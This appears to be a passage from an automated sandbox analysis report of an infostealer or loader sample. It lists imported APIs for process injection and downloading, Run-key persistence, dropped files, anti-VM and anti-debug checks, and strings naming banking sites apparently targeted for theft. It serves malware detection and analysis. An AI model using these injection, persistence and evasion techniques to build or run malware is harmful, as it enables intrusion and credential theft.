L32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNE
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                  Source: K6qneGSDSB.exeBinary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0E8B88B0
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\audiodg.exeWindow / User API: threadDelayed 1137Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2125Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7569Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 703Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 673Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWindow / User API: threadDelayed 2774Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWindow / User API: threadDelayed 7050Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\select.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pydJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_6-848
                  Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-1189
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-1189
                  Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-1135
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeAPI coverage: 1.8 %
                  Source: C:\Users\user\Desktop\Grabber.exe TID: 5772Thread sleep count: 178 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep count: 1197 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep time: -59850000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 1868Thread sleep count: 80 > 30Jump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 1868Thread sleep time: -216000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exe TID: 6200Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep count: 1137 > 30Jump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep time: -56850000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep count: 88 > 30Jump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep time: -237600s >= -30000sJump to behavior
                  Source: C:\Windows\System32\audiodg.exe TID: 3560Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -2018750s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 1892Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -7190550s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe TID: 6548Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                  Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                  Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD671BC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79CD671BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F285A0 FindFirstFileExW,FindClose,20_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F285A0 FindFirstFileExW,FindClose,21_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,21_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B837303C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B8373280
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7B10 GetSystemInfo,VirtualAlloc,VirtualAlloc,7_2_0E8B7B10
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.tmpJump to behavior
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,1
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2447810142.0000000001534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
